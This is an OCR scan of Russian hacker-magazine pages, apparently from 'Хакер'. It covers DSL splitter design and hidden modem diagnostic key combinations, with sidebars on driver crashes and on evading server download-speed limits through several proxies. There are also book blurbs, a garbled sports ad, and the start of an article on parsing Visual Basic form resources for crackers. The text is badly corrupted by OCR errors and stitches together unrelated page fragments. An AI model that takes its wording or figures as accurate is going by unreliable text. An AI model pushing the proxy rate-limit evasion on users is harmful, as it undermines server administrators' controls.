включать DSL-Tenecbou без них? Как они повлияют 
на качество связи? На этот счет существует мно- 
жество мнений, но большинство из них неправиль- 
ные. Чтобы не блуждать впотьмах, возьмем прин- 
ципиальную схему добротного сплиттера от Sie- 
mens и посмотрим, как он устроен (рисунок 1). 

Телефонная линия (LINE) соединяется с 
ADSL-mogemom практически напрямую! Именно 
«практически», так как соединение идет через ем- 
костную развязку по конденсаторам C1, C2, плюс 
защита, образованная разрядником GD1 с конден- 
сатором C4 и плавкими предохранителями Е1, Е2. 
Зато к телефонному выходу присобачена сложная 
система фильтрации на полосовых/резонансных 
трансформаторах, она убирает всю высокочастот- 


Таблица 1. Стандартные протоколы ОЗЁ-модемов с краткими характеристиками 


название стандарта 


downstream upstream 


ANSI T1.413-1998 Issue 2 ADSL 8 Mbit/s 1.0 Mbit/s 
ITU G.992.1 ADSL (G.DMT) 8 Mbit/s 1.0 Mbit/s 
ITU G.992.2 ADSL Lite (G.Lite) 1.5 Mbit/s 0.5 Mbit/s 
ITU G.992.3/4 ADSL2 12 Mbit/s 1.0 Mbit/s 
ITU G.992.3/4 Annex J ADSL2 12 Mbit/s 3.5 Mbit/s 
ITU G.992.3/4 Annex L RE-ADSL2 5 Mbit/s 0.8 Mbit/s 
ITU G.992.5 ADSL2+ 24 Mbit/s 1.0 Mbit/s 
ITU G.992.5 Annex L RE-ADSL2+ 24 Mbit/s 1.0 Mbit/s 
ITU G.992.5 Annex M ADSL2+ 24 Mbit/s 3.5 Mbit/s 
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ную составляющую и попутно исключает влияние 
телефона на О$ЗЕ-модем. 

График прохождения сигнала по линии LINE- 
ADSL представляет собой чуть ли не матема- 
тическую прямую, то есть сплиттер не вносит ни- 
каких существенных искажений. Очень хорошо! 

Вот (рисунок 4) кривая прохождения сигнала по 
линии LINE-POST (POST — это телефон или обыч- 
ный модем). Как видно, начиная с 34 КГц вся высо- 
кочастотная составляющая полностью вырезается, 
но сам профиль кривой... Ой, лучше не надо. Те- 
лефону еще ничего, а у модема (обыкновенного, то 
есть He DSL) могут возникнуть серьезные проблемы, 
и скорость передачи данных существенно упадет. 

Теперь (для контраста) возьмем сплиттер от 
ZyXEL ONMI. Принципиальная схема (рисунок 2) не 
внушает особого доверия: телефонная линия сое- 
динена с О$ЁЕ-модемом натуральной прямой, и 
здесь нет ничего, кроме защитного варистора VR1. 

Итого, неправильный расчет трансформато- 
pa L1 привел к значительным искажениям сигнала 
в цепи LINE-ADSL (рисунок 5), ухудшив скорост- 
ные характеристики модема. 

Что же насчет обыкновенного телефона (мо- 
дема)? Увы, нас ждет еще более безрадостная 
картина (рисунок 6), и сплиттер плавно ослабляет 
сигнал, обрезая его в районе 11 КГц, но даже в ра- 
йоне 3,7 КГц сигнал уменьшается уже на -10 GB, 
что ухудшит не только модемную связь, но и голо- 
совой телефон! 


Рисунок 1. Принципиальная схема сплиттера 
от Siemens 
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Рисунок 2. Принципиальная схема 
сплиттера от ZyXEL 
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Вывод: включать DSL-mogem напрямую в теле- 
фонную линию можно! Скорость передачи обычно 
только возрастает (особенно если в комплекте 
идет дешевый сплиттер). Обычный модем можно 
подключать параллельно в ОЗЁ безо всяких до- 
полнительных устройств! Если модем нечувстви- 
телен к высокочастотным помехам и не создает их 
сам, такое решение будет наилучшим! Проверено 
мыщьхом на его личном опыте! 

Кто-то может спросить: «Зачем оставлять 
обычный модем, если есть DSL?» Отвечаю: Ta- 
рифные планы некоторых провайдеров приводят к 
тому, что dial-up становится дешевле! При переда- 
че-приеме большого объема данных, нужных не 
срочно, это весьма актуально, к тому же через мо- 
дем можно администрировать свой компьютер на 
расстоянии, держать ВВ$ или... предоставлять 
«провайдерские» услуги своим знакомым. Да мно- 
го причин тут есть... 
> — модем для мониторинга телефонной линии. 
Достаточно часто скорость передачи данных нео- 
жиданно падает и, похоже, совсем не собирается 
возвращаться назад. Можно, конечно, позвонить в 
службу поддержки и выслушать совершенно бес- 
полезный совет «переустановить Windows», но 
лучше попытаться разобраться с проблемой само- 
стоятельно. Виновником может быть кто угодно: 
операционная система, браузер, злобный троян, 
неисправность ОЗЕ-модема, телефонный кабель, 
сервер провайдера или... Да что угодно! 

Через несколько месяцев интенсивного сер- 
финга через DSL может нагрянуть конкретное тор- 
можение браузера (из-за фрагментации файло- 
вой системы), хотя ни модем, ни интернет-канал 
ни при чем. Кстати, очистка кеша, как и дефраг- 
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Иконка модема ZyXEL 
OMNI ASDL USB 
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информационное окно 


ментация штатными дефрагментатором, помогает 
далеко не всегда — используй дефрагментаторы 
от О&О или Зутащес. 

> однако оставим операционное окружение в 
стороне. Уверен, ты и сам как-нибудь разберешь- 
ся с ним. Остаются два главных подозреваемых: 
телефонный кабель и провайдер. Если сервер 
провайдера отдает файлы с нормальной скоро- 
стью (за вычетом возможной нагрузки, характер- 
ной для данного времени суток), то DSL-mogem 
функционирует нормально и за телефонный канал 
можно даже не волноваться. Самая вероятная 
причина падения скорости — перегрузка маги- 
стральных интернет-каналов или проблемы у ап- 
линка (вышестоящего провайдера). 

Если даже сервер провайдера откликается 
неохотно, необходимо исследовать качество пере- 
дачи данных по телефонному кабелю. За что мы- 
щьх любит ZyXEL ONMI 56k Pro, так это за его 
ЕСО-дисплей, отображающий в реальном времени 
АЧХ-линии и прочую полезную информацию. Как 
насчет ОЗЁ-модемов? 

Практика показывает, что большинство DSL- 
модемов (даже из дешевых серий) содержат до- 
вольно развитую систему мониторинга физиче- 
ского канала связи, но по непонятным соображе- 
ниям прячут этот агрегат от пользователей в недо- 
кументированных сочетаниях команд. 

Возьмем, например, ZyXEL OMNI ASDL USB. 
Дешевый, HO довольно неприхотливый и стабиль- 
но работающий модем. Лениво перемигивается 
бело-зеленой иконой в правом углу экрана. 

Двойной мышиный щелчок вызывает инфор- 
мационное окошко спартанского типа, с указани- 
ем количества принятых и переданных байт. 
В правом верхнем углу наличествует традицион- 
ный крестик «Закрыть». Никаких других элемен- 
тов управления не наблюдается... 

Однако стоит нажать «секретную» комбина- 
цию <Alt>+<A>, как диалоговое окно значительно 
преображается, показывая кнопки Advanced moni- 
toring и Configuration wizard. Вторая из них нам ма- 
ло интересна: обычный мастер, вызывается при 


Таблица 2. Влияние затухания сигнала на качество линии 


затухание сигнала 


от 5dB до 20dB 


качество линии 


линия отличная 


от 20dB до 30dB 


линия хорошая 


от 30dB до 40dB 


линия плохая 


от 50dB и выше 


это не линия 


Таблица 3. Зашумленность и качество 


уровень шума: RMS Noise Energy [dBm] 
от -65dBm до -50dBm 


качество линии 


линия отличная 


от -50dBm до -35dBm 


линия хорошая 


от -35dBm до -20dBm 


линия плохая 


от -20dBm и выше 


это не линия 
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МНОГИЕ ПОЛЬЗОВАТЕЛИ ЖАЛУЮТСЯ, 
ЧТО ПОСЛЕ УСТАНОВКИ 0$1-МОДЕМА 
WINDOWS ВДРУГ ОБЗАВОДИТСЯ ПОВАД- 
КОЙ ЧАСТО ПАДАТЬ, ВЫБРАСЫВАЯ ГО- 
ЛУБОЙ ЭКРАН СМЕРТИ (ОН ЖЕ BSOD). 
ПРИТОМ ПАДЕНИЯ ПРОИСХОДЯТ В СА- 
МЫХ НЕПРЕДСКАЗУЕМЫХ МЕСТАХ: ПРИ 
ЗАПУСКЕ ОСЛА ИЛИ ПРОИГРЫВАНИИ 
ВИДЕОФАЙЛА. САМ ОСЕЛ, ЕСТЕСТВЕН- 
НО, НИ ПРИ ЧЕМ. КАК ПРИЛОЖЕНИЕ 
ПРИКЛАДНОГО РЕЖИМА, ОН ФИЗИЧЕ- 
СКИ НЕ В СОСТОЯНИИ ВЫЗВАТЬ BSOD. 
ВИДЕОПРОИГРЫВАТЕЛЬ ТОЖЕ. 


ВИНОВАТЫ КРИВЫЕ ДРАЙВЕРЫ, ПИСАН- 
НЫЕ КОЕ-КАК. И ДРАЙВЕРЫ САМОГО 
МОДЕМА, И ДРАЙВЕРЫ ВИДЕОКАРТЫ. 
КОНФЛИКТ МЕЖДУ НИМИ — ОБЫЧНОЕ 
ДЕЛО. ТИПИЧНАЯ ПРОГРАММИСТСКАЯ 
ОШИБКА — ПОПЫТКА ОСВОБОДИТЬ 
УЖЕ ОСВОБОЖДЕННУЮ ПАМЯТЬ. ПРИ 
М/ЕВ-СЕРФИНГЕ ОНА ПРАКТИЧЕСКИ НИ- 
КОГДА НЕ ВОЗНИКАЕТ (ВЕРОЯТНОСТЬ 
СЛИШКОМ МАЛА), НО ОСЕЛ — ДРУГОЕ 
ДЕЛО. ЧЕМ ИНТЕНСИВНЕЕ НАГРУЗКА НА 
МОДЕМ, ЧЕМ БОЛЬШЕ СОЕДИНЕНИЙ ОН 
ОБРАБАТЫВАЕТ В ЕДИНИЦУ ВРЕМЕНИ, 
ТЕМ БОЛЬШЕ ШАНСОВ СХЛОПОТАТЬ 
ВЗОР. ЗАБАВНО, НО ДО W2KSP4 СИСТЕ- 
МА НЕ ПРОВЕРЯЛА СИТУАЦИЮ С ПОВ- 
ТОРНЫМ ОСВОБОЖДЕНИЕМ И ВСЕ РА- 
БОТАЛО НОРМАЛЬНО (ТОЧНЕЕ, «КАК 
БЫ» НОРМАЛЬНО, НО РАБОТАЛО ЖЕ!!), 
ОДНАКО В КАКОЙ-ТО МОМЕНТ MICRO- 
SOFT, В ЦЕЛЯХ БОРЬБЫ ЗА СТАБИЛЬ- 
НОСТЬ СИСТЕМЫ, РЕШИЛА ТРАКТОВАТЬ 
ЭТО КАК «ПОЗОР, КОТОРЫЙ МОЖЕТ 
СМЫТЬ ТОЛЬКО BSOD». BOT И... 


КАК БЫТЬ? ЧТО ДЕЛАТЬ? САМОЕ ПРО- 
СТОЕ — ПРИОБРЕСТИ НОРМАЛЬНЫЙ 
О$Е-МОДЕМ, ПОДКЛЮЧАЕМЫЙ ЧЕРЕЗ 
ETHERNET. С НИМ ТАКИХ ПРОБЛЕМ НЕТ. 
ВЫХОД ВТОРОЙ — СНЕСТИ $Р4 ВСЕМ, 
КТО ЕЩЕ СИДИТ НА W2kK. ВЫХОД ТРЕ- 
ТИЙ — ОТКЛЮЧИТЬ СООТВЕТСТВУЮ- 
ЩИЙ ВУССНЕСК-КОД ПУТЕМ ПРАВКИ 
ЯДРА В ПАМЯТИ (О ТОМ, КАК ЭТО СДЕ- 
ЛАТЬ, РАССКАЗЫВАЕТСЯ В СТАТЬЕ 
«ЖИЗНЬ ПОСЛЕ BSOD» — «ХАКЕР»). 


НАКОНЕЦ, МОЖНО ОБНОВИТЬ ВСЕ 
ДРАЙВЕРЫ, КОТОРЫЕ ТОЛЬКО ЕСТЬ В 
СИСТЕМЕ. А ВДРУГ РАЗРАБОТЧИКИ УЖЕ 
ИСПРАВИЛИ ОШИБКИ2?.. 


настройке модема. Однако Ha Advanced monitoring 
остановимся поподробнее. 

Нажимаем его и попадем в стандартный настроеч- 
ный диалог. Тот самый, который можно вызывать и 
с «Панели управления», и через «Главное меню» - 
«Программы» > ZyXEL OMNI ADSL USB - ZyXEL 
OMNI ADSL USB. Фи! Какое разочарование. Нам 
предлагают узнать «протокольную» скорость прие- 
ма-передачи, изменить модуляцию, параметры 
ASDL-3aronoska, идентификаторы виртуальных ка- 
налов и максимальный размер пакетов. 

За исключением размера пакетов, никакие 
настройки лучше не трогать. В лучшем случае ско- 
рость не изменится вообще, в худшем — ОЗЁ-мо- 
дем просто не сможет установить связь с оконеч- 
ным оборудованием, так как большая часть на- 
строек продиктована именно им! 

Но вот мы нажимаем <Alt>+<A>, и настроеч- 
ный диалог радикально преображается. Абсолют- 
но преображается! Во вкладке General появляется 
симпатичный «светодиодный» индикатор, отобра- 
жающий мгновенную скорость приема, а ниже — 
очень полезная кнопка Stop ADSL, которую стоит 
отметить особо. Это единственный способ выйти 
из сети без прав администратора и без выдергива- 
ния телефонного кабеля из розетки, но увы, недо- 
кументированный. Думаю, не надо перечислять 
все ситуации, в которых пользователь хочет вре- 
менно отключиться от интернета, особенно если он 
сидит на скоростном канале, когда выражение 
«Время — деньги» приобретает особую финансо- 
вую остроту. Опять-таки атаки... 

В следующей закладке, ATM Link Statistic 
(которой в стандартном диалоге и не ночевало), 
мы можем узнать статистику по АТМ-линку. Боль- 
ше всего здесь нас интересует параметр Cells/Se- 
cond — мгновенная скорость приема-передачи в 
ячейках. Размер самой ячейки можно вычислить 
разделив количество переданных (принятых) бай- 
тов на количество переданных (принятых) ячеек. В 
моем случае оно равно 53 байтам. (Попутно заме- 
тим, что есть два типа ячеек: CPLO и CPL1. Расши- 
фровывается как Се! Lass Priority — приоритет no- 
тери ячейки. Цифра, следующая 3a «CPL», показы- 
вает, может он быть потерян (1) или не может (0). 
Приоритет назначается как самим DSL-mogemom, 
так и оконечным оборудованием.) В любом случае 
это принятые ячейки. Непринятые указываются в 
графе Unroutable Cells, и на нормальных каналах с 
исправным модемом здесь должен наличество- 
вать ноль. Также обрати внимание на количество 
НЕС-ошибок (Heder Error Control). Ненулевое зна- 
чение свидетельствует о проблемах связи, и чем 
больше это значение, тем актуальнее проблемы. 
Следующая вкладка, по сути, продолжает преды- 
дущую и приводит статистику по «хорошим» бай- 
там и фреймам. Еще она сообщает общее количе- 
ство «отброшенных» фреймов и байт (на нормаль- 
ных каналах и то и другое должно быть равно ну- 
лю). Далее следуют: ошибки СВС, число пакетов с 
неправильной длиной, ошибки тайм-аута. Все они 


тоже должны быть равны нулю или, во всяком слу- 
чае, близки к нему. 

Последняя вкладка Physical Layer Statistic цели- 
ком и полностью посвящена характеристикам фи- 
зического канала связи, то есть телефонного ка- 
беля. Noise margin — не что иное, как запас поме- 
хоустойчивости. Естественно, чем он больше, тем 
лучше. Вообще-то уровень зашумленности кана- 
ла принято выражать в несколько иных единицах, 
то есть в RMS Noise Energy — среднеквадратич- 
ной мощности шума, ее влияние на качество пе- 
редачи описано в таблице 3. По ней можно при- 
близительно оценить свою линию («приблизи- 
тельно» — потому что для точного пересчета 
необходимо знать максимальный уровень шума, 
при котором модем еще соглашается работать, но 
он неизвестен нам). 

Поле Attenuation определяет затухание сиг- 
нала в линии. Чем оно выше, тем ниже качество 
линии и, следовательно, меньше скорость переда- 
чи-приема данных. 

Магическая кнопка Bit Loading выводит на 
экран замечательную гистограмму, где отобража- 
ется распределение скорости передачи в битах по 
частотам. Дело в Tom, что в ADSL-npotokone весь 
частотный диапазон нарезается на крохотные ку- 
сочки, каждый из которых используется независи- 
мо от остальных. Чем выше зашумленность на 
данном участке, тем ниже битовая плотность (ско- 
рость передачи) и, соответственно, наоборот. 

Чем больше провалов (и чем они глубже), тем 
выше уровень зашумленности линии. Сравнивая 
гистограммы, полученные в разное время, можно 
попробовать локализовать возможный источник 
помех, поскольку большинство источников включа- 
ются и выключаются в определенное время. 
> _ лабораторные испытания показывают (www.ra- 
dioradar.net/staty/staty2005-02-25_18-39-56.php), что OCHOB- 
ной вклад в скорость передачи данных вносит ча- 
стотная характеристика линии (напрямую зависит 
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от ее емкости) и... этот вездесущий шум. При низ- 
ком уровне шума соединение устанавливается да- 
же на «запредельных» расстояниях, несмотря на 
затухание. Сопротивление кабеля — не помеха 
DSL-mogemy. Самый же страшный враг — контакт 
с землей, который возникает, как правило, в ре- 
зультате повреждения изоляции или замокания 
кабеля. Низкочастотный шум, порожденный им, в 
первую очередь бьет по исходящему потоку, одна- 
ко и высокочастотного шума, образующегося за 
счет асимметрии параметров линии, при включен- 
ном АЗОЕ-оборудовании тоже оказывается предо- 
статочно и скорость приема падает буквально на 
глазах. Только не пытайся «сушить» кабели ни ВЧ 
током, ни (тем более) подачей в телефонную сеть 
напряжения в 220 Вт. Только сожжешь оконечное 
оборудование (оно, между прочим, стоит нехилых 
денег), и неизвестно, что станет с телефонным ка- 
белем. Короче говоря, угробить его легко, а тянуть 
заново придется явно за свой счет... 

Другой частный дефект — окислившаяся 
скрутка кабеля или непропай. Встречается 
сплошь и рядом. Бороться еще можно, есть хоть 
какие-то способы, но соседство витой пары с АВУ 
и прочими системами ВЧ-уплотнения порождают 
помехи, избавиться от которых очень сложно. То 
же самое относится к ситуации с двумя витыми 
парами, висящими на DSL, в одном кабеле. Heo- 
жиданная потеря скорости вполне может объяс- 
няться тем, что кто-то из соседей (по кабелю) 
приобрел себе DSL-mogem. В ответ ты измеряешь 
характеристики линии, тем самым получаешь 
ценный результат и успешно разбираешься в си- 
туации. Во всяком случае, будет с чем идти к про- 
вайдеру, чтобы поругаться. 

Остальные О$Е-модемы тоже умеют изме- 
рять характеристики линии, что многие из них де- 
лают намного круче, чем ZyXEL OMNI USB. Одна- 
ко каждый раз приходится заново самостоятельно 
определять «магические» комбинации. 
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Когда-то РОЕ был экзоти- 

кой, теперь же этот формат 
распространен не меньше, чем Word. Но при- 
чем тут взлом? Автор считает, что хакинг — 
это не обязательно проникновение в компью- 
терные системы или нанесение ущерба. 
К хакингу он относит грубое решение проб- 
лемы или остроумный способ обхода ограни- 
чений. Изначально формат PDF был техно- 
логией, взломать которую невозможно, а 
предлагаемые средства работы с PDF orpa- 
ничивались только производителем Adobe. 
В книге показаны те возможности PDF-cbop- 
мата, которые недоступны в стандартных 
средствах редактирования. Ты сможешь ге- 
нерировать файлы с заказным контентом 
или создавать формы для двухсторонней 
связи. Здесь же рассказано про шифрование 
и расшифровку документов в PDF, преобра- 
зование в растровый формат, защиту от ко- 
пирования, Пёт|-оглавления и многое другое 
вплоть до создания в Acrobat сценариев на 
Visual Basic, Perl и Java Script. 


ВЕ 
aa $ Хакинг Интернет 
ИНТЕРНЕТ 
ре. М.: ЗАО «Новый 
издательский дом», 2005 / 
Максим Левин / 240 страниц 
| my Разумная цена: 124 рубля 
я i | 


Интернет был и остается 

самым небезопасным мес- 
том времяпрепровождения. Ошибки при 
проектировании сервисов TCP/IP, слож- 
ность конфигурирования хостов, уязвимые 
места в программах и проч. открывают для 
хакеров двери в неподготовленные сети. В 
этой книжке доступно рассказано об устрой- 
стве протокола TCP/IP, рассмотрены проб- 
лемы, связанные с безопасностью. Тут же 
говорится про использование ЗО! -запросов 
и политику безопасности при работе в Сети. 


ограничение 
скорости отдачи 


ДАЛЕКО НЕ ВСЕ СЕРВЕРЫ СОГЛАШАЮТСЯ ОТДАВАТЬ ДАННЫЕ С «КРЕЙСЕРСКОЙ» СКОРО- 
СТЬЮ, И ЧАСТО СР$ ДЕРЖИТСЯ НА УРОВНЕ 25-50 КБ/С, КОГДА ДАЖЕ НА ДВУХМЕГАБИТ- 
НОМ КАНАЛЕ МЫ ВПРАВЕ ОЖИДАТЬ -256 КБ/С ИЛИ ХОТЯ БЫ 200. ПОЧЕМУ ЖЕ В ЖИЗНИ 
ВСЕ ТАК ГАДКО, ДАЖЕ КОГДА У ТЕБЯ DSL? 


ВОТ ПОТОМУ И ГАДКО, ЧТО DSL УЖЕ НЕ РОСКОШЬ, А «ЭПИДЕМИЯ», НА КОТОРУЮ БОЛЬ- 
ШИНСТВО СЕРВЕРОВ, КАК ОКАЗАЛОСЬ, ПРОСТО НЕ РАССЧИТАНО! КАКУЮ ЖЕ ПРОПУ- 
СКНУЮ СПОСОБНОСТЬ НУЖНО ИМЕТЬ, ЧТОБЫ ОБСЛУЖИВАТЬ ХОТЯ БЫ НЕСКОЛЬКО СО- 
ТЕН «СОСУНОВ», ПОДКЛЮЧИВШИХСЯ ОДНОВРЕМЕННО! ВОТ И ПРИШЛОСЬ АДМИНИСТРА- 
ТОРАМ ПОЙТИ НА КРАЙНЮЮ МЕРУ, ОГРАНИЧИВ ЛИБО КОЛИЧЕСТВО ПОДКЛЮЧЕНИЙ, ЛИ- 
БО СКОРОСТЬ ОТДАЧИ, А ЧАЩЕ И ТО И ДРУГОЕ. ЕСТЕСТВЕННО, ПОЛЬЗОВАТЕЛЯМ ЭТО НЕ 
НРАВИТСЯ, И ОНИ ВСЕМИ СИЛАМИ СТРЕМЯТСЯ ВЫТЯНУТЬ СВОИ ЗАКОННЫЕ ГИГАБИТЫ В 
СЕКУНДУ. ПРАКТИЧЕСКИ ВСЕ ПОПУЛЯРНЫЕ DOWNLOADER’bI ПОДДЕРЖИВАЮТ МНОГОПО- 
ТОЧНЫЙ РЕЖИМ (КОГДА ОДИН ФАЙЛ КАЧАЕТСЯ СРАЗУ С НЕСКОЛЬКИХ МЕСТ, КАЖДОЕ ИЗ 
КОТОРЫХ «ОБСЛУЖИВАЕТСЯ» СВОИМ ТСРЛР-СОЕДИНЕНИЕМ). КРОМЕ ТОГО, МОЖНО СКА- 
ЧИВАТЬ НЕСКОЛЬКО ФАЙЛОВ ОДНОВРЕМЕННО. ТОЛЬКО И АДМИНИСТРАТОРЫ СОВСЕМ 
НЕ ЛОСИ. ОНИ ТУТ ЖЕ ПРОНЮХАЛИ ЭТО ДЕЛО И СТАЛИ КОНТРОЛИРОВАТЬ IP! СКОЛЬКО 
БЫ СОЕДИНЕНИЙ НИ УСТАНАВЛИВАЛ «СОСУН», СУММАРНАЯ СКОРОСТЬ ОСТАНЕТСЯ ТОЙ 
ЖЕ. КСТАТИ, В РЕЗУЛЬТАТЕ БОЛЬШЕ ВСЕХ ПОСТРАДАЛИ ТЕ ПОЛЬЗОВАТЕЛИ, КОТОРЫЕ 
СИДЯТ HA PROXY И ВЫНУЖДЕНЫ ДЕЛАТЬ ОДИНТР НА ВСЕХ. 


О! PROXY! ЭТО ЖЕ ПРЕВОСХОДНЫЙ РЕЦЕПТ СПАСЕНИЯ! ЕСЛИ КАЧАТЬ ФАЙЛ ЧЕРЕЗ НЕС- 
КОЛЬКО РВОХУ-СЕРВЕРОВ ОДНОВРЕМЕННО, ТО АДМИНИСТРАТОР НИЧЕГО НЕ ЗАМЕТИТ... 
ЧТО Ж, ДЕЙСТВИТЕЛЬНО, В НАСТОЯЩИЙ МОМЕНТ АДМИНИСТРАТОРЫ НЕ ГОТОВЫ ОТРА- 
ЗИТЬ ТАКУЮ АТАКУ, ОДНАКО НЕОБХОДИМО ПОМНИТЬ, ЧТО ЕСЛИ АДМИН ВСЕ-ТАКИ ДОГА- 
ДАЕТСЯ, ЧТО ЕГО ХАЧАТ, ХАКЕР МОЖЕТ ЗАПРОСТО ПОЛУЧИТЬ БАН НА НЕКОТОРОЕ BPE- 
МЯ ИЛИ ДАЖЕ НА ВСЮ ОСТАВШУЮСЯ ЖИЗНЬ. ЭТО РАЗ. 


БОЛЬШИНСТВО БЕСПЛАТНЫХ ПРОКСИ РАБОТАЮТ МЕДЛЕННО И НЕ ВСЕГДА АНОНИМНЫ 
(ТО ЕСТЬ УСТАНОВИТЬ ОРИГИНАЛЬНЫЙ IP ВСЕ-ТАКИ ВОЗМОЖНО). ЭТО ДВА. СРЕДИ ПОПУ- 
ЛЯРНЫХ DOWNLOADER’OB МЫЩЬХУ НЕ ИЗВЕСТЕН НИ ОДИН, КОТОРЫЙ БЫ ПОДДЕРЖИВАЛ 
МНОГОПОТОЧНУЮ ДОКАЧКУ С ИСПОЛЬЗОВАНИЕМ РАЗЛИЧНЫХ PROXY! 


ДРУГАЯ ПРИЧИНА НИЗКОЙ СКОРОСТИ — БАНАЛЬНАЯ ПЕРЕГРУЗКА. ЕСЛИ ПЕРЕГРУЖЕН ОС- 
НОВНОЙ САЙТ, ПОПРОБУЙ НАЙТИ ЕГО ЗЕРКАЛО. ЕСЛИ ПЕРЕГРУЖЕН ОДИН ИЗ ПРОМЕЖУ- 
ТОЧНЫХ УЗЛОВ, ИСПОЛЬЗУЙ РВОХУ-СЕРВЕР ИЛИ... КАЧАЙ ДАННЫЕ С ТОЙ СКОРОСТЬЮ, 

С КОТОРОЙ ИХ ДАЮТ. В КОНЦЕ КОНЦОВ, ДАЖЕ 25 КБ/С — ОЧЕНЬ ПРИЛИЧНАЯ СКОРОСТЬ. 


К примеру, ADSL ZyXEL USB630-11 требует совер- 
шить следующий обряд. Дважды щелкнуть мы- 
шью по пиктограмме модема, отображаемой в си- 
стемном трее. На экране появляется диалог ADSL 
Control and Status с прямоугольным голубым лого- 
типом ZyXEL. Жмем <Ctrl>+<Shift> vu, не отпуская, 
щелкаем мышкой логотип. Под логотипом тут же 
появляется кнопка с соблазнительным названием 
Advanced, она открывает диалог с огромным коли- 
чеством разнообразных вкладок, в которых не 
так-то просто разобраться! Да ну их. Идем к вклад- 
ке Detonator (хорошее имечко, нечего сказать) с 
единственной кнопкой Monitor Performance. Все 
ключевые характеристики линии сосредоточены 
именно здесь! Вызов графической гистограммы 
осуществляется нажатием кнопки Bits Рег Tone. 
Модем ADSL USB D-Link DSL 200 Generation II 
поддерживает секретную комбинацию <Ctrl>+<F1>, 


которая вызывается из закладки Physical Link 
и отображает все необходимые нам характеристи- 
ки. Модем ADSL USB D-Link DSL 2001 делает то же 
самое комбинацией <ALD>+<D>, модемы ADSL 
ZyXEL USB 630-С1 и ADSL ZyXEL USB 630-C1 за- 
клинаются при помощи <Alt>+<A>. 

Владельцам остальных модемов можно по- 
советовать либо тупо перебирать все комбинации 
одну за другой, либо полазить по хакерским фору- 
мам — наверняка кто-то уже распотрошил драй- 
вер и раскопал все заклинания. 
> заключение. DSL-mogemb! еще хранят MHO- 
жество тайн и магических способностей, расковы- 
рять которые нам только предстоит. Эксперимен- 
тируй с настойками, дизассемблируй драйверы, 
потроши свежие прошивки! В общем, оттягивайся 
по полной! Мы же хакеры, а не пользователи ка- 
кие-нибудь в конце концов № 


на poe TSHMe игровое Poociatc 
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Игра стартует с первым турам чем - 
пионота российской презмьарелиги 
и финишируат Motion 30-го Typo. 
7604 ЮСЕМЬСЕНЫАС ACAMMO COCOA Ha 

11 основных игроков, 4-х запасных 
игловного тренер. Количаства 321 
мена команде на ограничено. Стом- 
мость команды навась Caco - $4.09 
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ИСПОЛЬЗУЯ ИНФОРМА- 


ЦИЮ ИЗ ЭТОЙ СТАТЬИ, 
ТЫ БЕЗ ТРУДА НАПИ- 
ШЕШЬ СВОЙ RESOUR- 
CEHACKER ДЛЯ VISUAL 
BASIC, АНАЛОГОВ KOTO- 
РОМУ НА СЕГОДНЯШНИЙ 
ДЕНЬ НЕ СУЩЕСТВУЕТ 


имплантанты 
пышных форм 


ИСКУССТВО РЕДАКТИРОВАНИЯ 
ИНТЕРФЕИСА ПРОГРАММ HA VB 


ОПЫТНЫМ КРЭКЕРАМ ИЛИ РУСИФИКАТОРЩИКАМ НАВЕРНЯКА ПОПАДАЛИСЬ ПРО- 
ГРАММЫ, НАПИСАННЫЕ HA VB. ЧТО ИНТЕРЕСНО, НА ДАННЫЙ МОМЕНТ НЕТ СОВСЕМ 
НИКАКОЙ ИНФОРМАЦИИ О РЕДАКТИРОВАНИИ ФОРМ И КОНТРОЛОВ НА НИХ. НАЧНЕМ 
ИСПРАВЛЯТЬ СИТУАЦИЮ ПРЯМО СЕЙЧАС |6РСн (ADMINEVE-DECOMPILER.ORG) 


Русификаторщики, крэкеры и просто продвинутые 
пользователи давно привыкли редактировать ин- 
терфейсы программ с помощью Restorator или 
Resource Hacker. К сожалению, эти утилиты никак 
не видят ресурсы VB-nporpamm. Формат, в KOTO- 
ром они хранятся, в принципе, несложный, но кто 
захочет писать отдельный редактор ресурсов спе- 
циально под \/В? Нам же остается только изучать 
этот формат самостоятельно. 

Для начала разберем, как найти эти самые ре- 
сурсы в VB-nporpamme. Возьмем оригинальную точку 
входа в программу. Чтобы перейти на нее из НЕХ-ре- 
дактора HIEW, потребуется лишь загрузить ехе’шник 
в данный НЕХ-редактор и по очереди нажать <Enter>, 
<F8>, <F5>. Те, у кого оплачен HIEW, знают, как опти- 
мизировать эту операцию до командной строки. 
Взгляду представится примерно следующее: 


push 0004042E8 ;'VB5!' 
call ThunRTMain ;MSVBVM60 --?2 


Теперь считываем структуру VBHeader по адресу 
0004042E8 (таблица 1). Kak ни парадоксально, для 
исследования больше не потребуются никакие 
структуры — все нужное выцепим из VBHeader. 


Мощная структура, да? Все элементарно! Нам по- 
требуется только FormCount (чтобы определять 
число форм) и указатель на структуры, описываю- 
щие формы, — aGUlTable. Структуру GUITable 
смотри на таблице 2. 

Таких структур столько же, сколько форм в 
проекте, и они идут одна за другой. Чтобы полу- 
чить адрес начала формы, к aFormPointer прибав- 
ляем 93. Этот адрес должен указывать на длину 
информации о форме. Есть небольшая хитрость: 
адрес может занимать 2 либо 4 байта. Если счи- 
танный DWORD от_АМО’ить с &H80000000, то мы 
определим число байт информации. Если DWORD 
содержит флаг &Н80000000, то длина записана в 
4 байта. В противном случае — в два. После дли- 
ны идет собственно описание формы и лежащих 
на ней контролов. Вот оно! Как раз то, что искали! 
Теперь настало время разобраться с бинарным 
форматом форм и контролов. 
> — бинарный формат формы. Когда-то, во вре- 
мена VB 1.0 for DOS, все формы сохранялись по 


умолчанию в бинарном формате и это считалось 
нормальным. Современные же люди, привыкшие 
редактировать тт-файлы прямо в блокноте, с тру- 
дом представляют себе, что те же формы можно 
представить в упакованном бинарном формате. 
Почему упакованном? Потому что узнавать ин- 
формацию о последнем контроле на форме нужно 
после того, как последовательно пропарсишь все 
предыдущие контролы. Значит, для добавления 
нового свойства контролу придется перепаковать 
всю структуру: сначала декомпилировать ее, по- 
том изменить и снова скомпилировать, как это де- 
лает VB. Сложно, не спорю. Но что поделаешь? 
Самые большие сложности возникают в том 
случае, если на форме лежит ActiveX или User- 
Control, который нужно выделить, чтобы не изме- 
нить его неизвестные свойства. Программеры 60- 
ятся всех этих сложностей, поэтому по сей день 
не написано ни одного нормального редактора 
интерфейса \УВ-программ и русификаторы к VB- 
программам практически никем не создаются. 


ЗАГЛЯНИ НА КОМПАКТ-ДИСК — ТАМ ТЫ НАЙДЕШЬ 


ВСЕ НЕОБХОДИМОЕ ДЛЯ ИССЛЕДОВАНИЯ \В-ФОРМ 


Надеюсь, что, когда прочитаешь эту статью, ты 
разберешься, как устроены формы VB и как раз- 
бирать их и собирать заново. В бинарном упако- 
